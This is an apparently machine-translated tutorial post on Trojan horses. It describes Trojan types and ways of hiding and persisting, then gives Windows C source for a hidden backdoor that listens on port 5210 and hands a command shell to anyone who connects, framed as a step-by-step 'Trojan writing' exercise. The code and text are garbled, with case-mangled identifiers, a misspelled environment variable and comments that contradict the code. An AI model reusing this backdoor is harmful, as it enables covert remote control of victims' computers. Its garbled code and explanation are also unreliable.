Preface
before we have learned the virus-free technology to kill the signature code, but Trojan people are not feeling or very mysterious, then let me for you to uncover the mystery of the Trojan Horse.
first, the basic knowledge
1.1. Trojan virus
Trojan Horse (Trojan) the name is derived from the ancient Greek legend (the story of the Trojan Horse in Homer, Trojan the meaning of the word is Troy, that is, refers to the Trojan Horse, the story of the Trojan Horse).
Trojan will do everything possible to hide themselves, the main way is: Hide themselves in the taskbar, this is the most basic way. Simply set the Visible property of the form to False,showintaskbar to false, and the program will not appear in the taskbar when it is run. Stealth in Task Manager: Setting a program to system service makes it easy to disguise yourself. Of course it will also silently start, hackers certainly do not expect users to click on the "Trojan" icon to run the server after each launch, "Trojan" will be automatically loaded every time the user starts. Windows system startup automatically load the application method, "Trojan" will be used, such as: Start group, Win.ini, System.ini, registry, etc. are "trojan" hiding good place. Trojan Horse and computer network often to use the remote control software is similar, but because the remote control software is "good" control, so usually do not have concealment; "Trojan" is the opposite, the Trojan to achieve is "stealing" the remote control, if there is no strong concealment, it is "worthless."
1.2, Trojan horse program principle
Trojan virus works: A complete Trojan Horse package program contains two parts: the server side (Servers section) and the Client (Controller section). The computer that is implanted is the server, and the hacker is using the client to enter the computer running the server. After running the service side of the Trojan, it will produce a process with easy to confuse the user's name, secretly open the port, send data to the designated place (such as the password of the network game, instant communication software password and user's Internet password, etc.), the hacker can even use these open ports to enter the computer system.
1.3. General Trojan Type
Password-Sending Trojan
Password Send Trojan can be found in the case of the victim did not know the hidden password to send to the designated mailbox, so as to achieve the purpose of obtaining a password, such Trojans mostly use 25 port to send e-mail.
Keylogger-Type Trojan
Keylogger Trojan is mainly used to record the victim's keystroke record, this kind of Trojan has online and offline record two options, respectively recording the other side in the online and offline state when tapping the keyboard keys.
Destructive Trojan
As the name implies, the only function of the destructive Trojan is to destroy the computer file system of the infected Trojan, causing it to suffer the huge loss of system crash or important data loss.
Agent Trojan
Agent Trojan is the most important task is to control the "broiler" planted agent Trojan, let it become an attack by the attacker's version. Through such trojans, attackers can use Tenlet, ICO, IRC and other programs in an anonymous situation, so as to conceal their footprints at the time of intrusion, beware of other people's identity.
FTP Trojan
The only function of the FTP Trojan is to open 21 port and wait for the user to connect, the new FTP Trojan also added a password function, so that only the attacker knows the correct password, so that access to each other's computer.
Bounce Port Type Trojan
Bounce Port Type Trojan server (controlled side) using the active port, the client (control side) using the passive port, just as opposed to the general Trojan, Trojan Timer detection control side of the existence, found that the control end of the line immediately pop-up active connection collar open port control.
1.4, the common technology
For ordinary people, the Trojan is inscrutable, difficult to understand, the following list of commonly used programming techniques, uncover the mysterious veil of the Trojan Horse
- Modify Registry Technology
- Multithreading Technology
- Background monitoring Technology
- Timing Trigger Technology
Second, the Trojan Horse writing actual combat
let's start with a new project.Write the program when we need to think about the implementation of those functions, write Trojan Same, first I prepare to write a backdoor trojan, the main function is to give us a port, let us use the Telnet command to connect up, thus controlling the target computer, as a trojan, we certainly need to hide themselves. The code is as follows:
#pragmaComment (lib, "Ws2_32.lib")//here we statically join a Lib file, which is ws2_32.lib</font>#pragmaComment (linker, "/subsystem:\" windows\ "/entry:\" Maincrtstartup\ "")//Set connector options#include<winsock2.h>//contains header file Winsock2.h, this is the header file for Windows Sockets#include<windows.h>//used, not explained.#defineMasterport 5210//define a constant, which is the port we want to open laterMain ()//The main function does not explain{wsadata Wsada; //This structure is used to store the Windows Sockets data returned after being called by the WSAStartup function. The basic on the back almost does not explain, do not understand please Baidusockaddr_in Sockaddrin; SOCKET Csocket,ssocket; intiaddrsize; Process_information ProcessInfo; Startupinfo Startupinfo; Charszcmdpath[255];
//allocating memory, initializing dataZeroMemory (&processinfo,sizeof(process_information)); ZeroMemory (&startupinfo,sizeof(Startupinfo)); ZeroMemory (&wsada,sizeof(Wsadata)); //Get cmd pathGetEnvironmentVariable ("Comspeg", Szcmdpath,sizeof(Szcmdpath)); //load Ws2_32.dllWSAStartup (0x0202,&Wsada); //set the local information and binding protocol, set up the socket, the code is as follows:sockaddrin.sin_family =af_inet; SockAddrIn.sin_addr.s_addr=Inaddr_any; Sockaddrin.sin_port=htons (Masterport); CSocket= WSASocket (Af_inet,sock_stream,ipproto_tcp,null,0,0); //set the binding port 999Bind (CSocket, (SOCKADDR *) &sockaddrin,sizeof(Sockaddrin)); //setting server-side listening portsListen (CSocket,1); Iaddrsize=sizeof(Sockaddrin); //start connecting to the remote server and configure the hidden window structure BodySsocket = Accept (CSocket, (SOCKADDR *) &SockAddrIn,&iaddrsize); STARTUPINFO.CB=sizeof(STARTUPINFO); Startupinfo.wshowwindow=Sw_hide; Startupinfo.dwflags= Startf_usestdhandles |Startf_useshowwindow; Startupinfo.hstdinput=(HANDLE) Ssocket; Startupinfo.hstdoutput=(HANDLE) Ssocket; Startupinfo.hstderror=(HANDLE) Ssocket; //To create an anonymous pipeline:CreateProcess (NULL, szcmdpath, NULL, NULL, TRUE,0, NULL, NULL, &startupinfo, &ProcessInfo); WaitForSingleObject (processinfo.hprocess, INFINITE); CloseHandle (processinfo.hprocess); CloseHandle (Processinfo.hthread); //To close a process handle:closesocket (CSocket); Closesocket (Ssocket); WSACleanup (); //Close Connection Uninstall Ws2_32.dll return 0; }
Set up CSocket to start, then bind Port 5210, then listen to this port, then receive commands from the client, and finally close the CSocket. This is a relatively simple forward connection backdoor program. This program is said to be relatively simple, the system restarts the Trojan will be cleared. Because you did not add the system boot entry, hide the process. The technology involved is more complex and will be explained later.
Then we put the compiled Trojan horse on the test machine to find out that the running program and nothing happened, but the program has been silently running, and opened our 5210 port.
We'll use another machine to connect and see if we can find a successful connection to the test machine.
Because there is no process hidden, so we can easily find the progress of the Trojan. The end is OK.
Thank you for watchingRELATED links: http://bbs.ichunqiu.com/thread-6935-1-1.htmlThank you for your reading, if you learn, please like (code word is not easy)! Welcome to the Garden friends to add!
Trojan Programming-hands-on Trojan horse programming with you into the world of Trojans